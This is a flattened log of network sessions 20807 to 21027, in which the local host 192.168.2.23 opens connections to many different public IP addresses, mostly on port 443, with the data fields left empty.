                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20807192.168.2.2346432101.130.244.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20808192.168.2.2334640217.134.17.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20809192.168.2.2351106160.105.30.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20810192.168.2.235812424.237.29.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20811192.168.2.233644661.136.27.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20812192.168.2.2339052163.9.184.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20813192.168.2.2359522170.141.23.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20814192.168.2.2352714174.46.197.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20815192.168.2.234178698.232.148.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20816192.168.2.2346390165.17.38.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20817192.168.2.2333446208.14.72.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20818192.168.2.2360044147.18.63.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20819192.168.2.236007836.193.68.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20820192.168.2.2358906177.174.16.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20821192.168.2.2342272167.223.206.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20822192.168.2.2341446203.126.228.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20823192.168.2.234414876.6.250.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20824192.168.2.2346234179.101.59.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20825192.168.2.234135447.113.102.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20826192.168.2.234293681.129.82.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20827192.168.2.235869619.133.239.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20828192.168.2.234839682.118.112.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20829192.168.2.234700498.245.145.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20830192.168.2.233372437.113.115.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20831192.168.2.2341736217.157.87.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20832192.168.2.23391625.215.239.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20833192.168.2.2338338146.212.34.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20834192.168.2.2342866176.182.198.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20835192.168.2.2344268126.186.182.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20836192.168.2.236019066.96.49.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20837192.168.2.23558904.12.36.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20838192.168.2.2334532208.59.24.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20839192.168.2.233965258.161.101.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20840192.168.2.235084841.155.48.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20841192.168.2.2352084172.238.20.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20842192.168.2.2335150186.12.198.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20843192.168.2.2335854185.246.239.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20844192.168.2.2340658189.9.46.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20845192.168.2.235044669.155.46.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20846192.168.2.2344506147.17.52.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20847192.168.2.235925014.224.216.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20848192.168.2.235326064.144.62.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20849192.168.2.2348370191.77.76.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20850192.168.2.234773860.182.1.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20851192.168.2.2347936145.54.25.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20852192.168.2.2349326125.222.133.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20853192.168.2.2352398133.50.88.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20854192.168.2.2338760100.177.222.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20855192.168.2.235738451.47.80.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20856192.168.2.234203488.24.69.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20857192.168.2.235995457.58.51.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20858192.168.2.2355160115.248.61.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20859192.168.2.2336514197.228.81.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20860192.168.2.2339272125.147.72.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20861192.168.2.2334308108.70.122.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20862192.168.2.2352210107.210.150.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20863192.168.2.2341668219.80.22.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20864192.168.2.2353906162.173.15.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20865192.168.2.2358394209.133.221.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20866192.168.2.234497441.250.141.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20867192.168.2.2353624120.63.106.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20868192.168.2.2350136101.97.15.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20869192.168.2.2360230137.224.55.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20870192.168.2.235739272.27.181.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20871192.168.2.234475836.200.24.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20872192.168.2.2334504216.158.140.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20873192.168.2.2354800141.135.145.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20874192.168.2.2350542176.106.128.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20875192.168.2.2352852137.236.72.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20876192.168.2.235651424.182.122.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20877192.168.2.235118895.115.23.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20878192.168.2.2341548189.45.122.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20879192.168.2.2351106171.25.243.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20880192.168.2.235352846.193.133.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20881192.168.2.234277251.66.14.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20882192.168.2.2354894102.193.45.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20883192.168.2.2341708198.128.48.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20884192.168.2.2350438140.67.245.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20885192.168.2.235581848.194.183.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20886192.168.2.2338558180.179.93.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20887192.168.2.2353648116.33.99.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20888192.168.2.2346752109.116.195.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20889192.168.2.2358212148.151.96.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20890192.168.2.235056839.232.173.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20891192.168.2.2354184203.100.5.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20892192.168.2.2340198116.92.243.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20893192.168.2.2351882117.3.223.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20894192.168.2.2348414129.137.222.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20895192.168.2.2346734112.138.105.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20896192.168.2.2339720185.171.255.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20897192.168.2.233570849.139.126.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20898192.168.2.2353576140.162.112.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20899192.168.2.235391023.36.235.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20900192.168.2.2359818122.42.68.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20901192.168.2.233648084.71.48.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20902192.168.2.2344860158.33.105.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20903192.168.2.233790445.142.108.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20904192.168.2.2352000157.236.226.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20905192.168.2.2342606179.198.221.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20906192.168.2.2350190131.19.82.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20907192.168.2.23559562.128.161.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20908192.168.2.2340464110.213.206.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20909192.168.2.235203494.122.13.1978080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20910192.168.2.234683881.171.236.618080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20911192.168.2.234400093.41.165.338080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20912192.168.2.233318614.86.53.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20913192.168.2.2352280115.237.57.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20914192.168.2.2340604182.228.178.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20915192.168.2.2342924111.67.231.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20916192.168.2.234920812.104.116.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20917192.168.2.235708223.151.69.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20918192.168.2.2355990109.108.200.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20919192.168.2.2337146153.113.217.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20920192.168.2.2358688219.173.7.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20921192.168.2.2334274200.68.48.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20922192.168.2.235752436.238.145.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20923192.168.2.2353932186.171.183.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20924192.168.2.234626686.69.95.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20925192.168.2.234191899.184.128.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20926192.168.2.2341698182.117.112.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20927192.168.2.235563846.136.245.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20928192.168.2.23530565.42.212.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20929192.168.2.235459634.107.133.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20930192.168.2.2357620192.5.192.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20931192.168.2.2338072163.220.108.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20932192.168.2.234922651.222.59.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20933192.168.2.2353338191.229.67.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20934192.168.2.2353690158.217.202.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20935192.168.2.236040446.120.102.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20936192.168.2.2359314193.13.33.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20937192.168.2.2346906125.122.94.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20938192.168.2.2353928184.217.162.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20939192.168.2.2342122116.74.202.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20940192.168.2.235170661.104.37.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20941192.168.2.2337500136.185.251.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20942192.168.2.233748444.76.97.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20943192.168.2.234410079.4.22.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20944192.168.2.234655458.124.85.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20945192.168.2.2338462161.219.153.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20946192.168.2.234895289.21.240.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20947192.168.2.23463704.227.74.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20948192.168.2.2357314221.251.139.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20949192.168.2.233327683.74.147.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20950192.168.2.235104885.167.102.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20951192.168.2.2359358105.176.153.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20952192.168.2.235054684.61.194.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20953192.168.2.2346792221.140.165.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20954192.168.2.235541250.228.157.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20955192.168.2.2346368200.213.42.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20956192.168.2.2337548192.247.51.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20957192.168.2.2350630142.110.63.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20958192.168.2.235115464.210.15.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20959192.168.2.234063870.116.195.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20960192.168.2.236012842.147.13.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20961192.168.2.2346648169.49.51.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20962192.168.2.2354482124.39.55.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20963192.168.2.2336482219.29.120.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20964192.168.2.2351056198.2.250.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20965192.168.2.235197818.128.117.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20966192.168.2.233595023.153.85.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20967192.168.2.2348992114.17.87.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20968192.168.2.234990048.83.17.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20969192.168.2.235085687.17.35.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20970192.168.2.2354838192.8.153.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20971192.168.2.2360744192.132.116.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20972192.168.2.2359754198.223.126.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20973192.168.2.2351914103.13.118.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20974192.168.2.2350896175.93.12.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20975192.168.2.235681644.200.22.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20976192.168.2.2356368165.45.51.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20977192.168.2.234490066.101.167.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20978192.168.2.2356000128.207.168.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20979192.168.2.235857848.75.239.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20980192.168.2.2342310219.196.72.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20981192.168.2.233629848.213.200.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20982192.168.2.2338642164.174.103.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20983192.168.2.2333384204.65.100.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20984192.168.2.2345194125.109.231.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20985192.168.2.2351392165.211.241.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20986192.168.2.23353684.133.65.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20987192.168.2.235795489.1.39.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20988192.168.2.233753287.107.135.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20989192.168.2.2346454154.177.238.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20990192.168.2.2338598126.126.196.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20991192.168.2.233534283.19.63.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20992192.168.2.2359186149.40.196.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20993192.168.2.2359548117.156.76.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20994192.168.2.233330481.104.73.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20995192.168.2.2348308162.123.252.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20996192.168.2.2335958122.45.16.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20997192.168.2.2335944141.81.230.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20998192.168.2.236044454.184.170.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20999192.168.2.234762069.16.182.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21000192.168.2.2333696160.72.242.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21001192.168.2.2336848156.24.99.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21002192.168.2.233920090.77.170.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21003192.168.2.2360108189.30.253.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21004192.168.2.2349484218.35.192.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21005192.168.2.2339786187.238.224.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21006192.168.2.2335868142.246.26.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21007192.168.2.233366683.207.28.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21008192.168.2.2342764111.76.37.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21009192.168.2.2347616121.190.10.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21010192.168.2.2343376179.92.192.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21011192.168.2.2360380118.60.204.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21012192.168.2.2338846178.166.99.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21013192.168.2.2335226166.233.19.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21014192.168.2.2357526161.69.234.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21015192.168.2.235412247.101.205.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21016192.168.2.2354856217.34.133.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21017192.168.2.2341986209.45.20.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21018192.168.2.2341288114.197.160.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21019192.168.2.234889670.144.48.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21020192.168.2.2344574158.140.134.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21021192.168.2.233538623.162.119.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21022192.168.2.235185682.230.63.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21023192.168.2.2337018135.69.100.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21024192.168.2.236080681.21.23.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21025192.168.2.2357106110.79.169.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21026192.168.2.234769454.196.156.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21027192.168.2.234784466.147.62.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
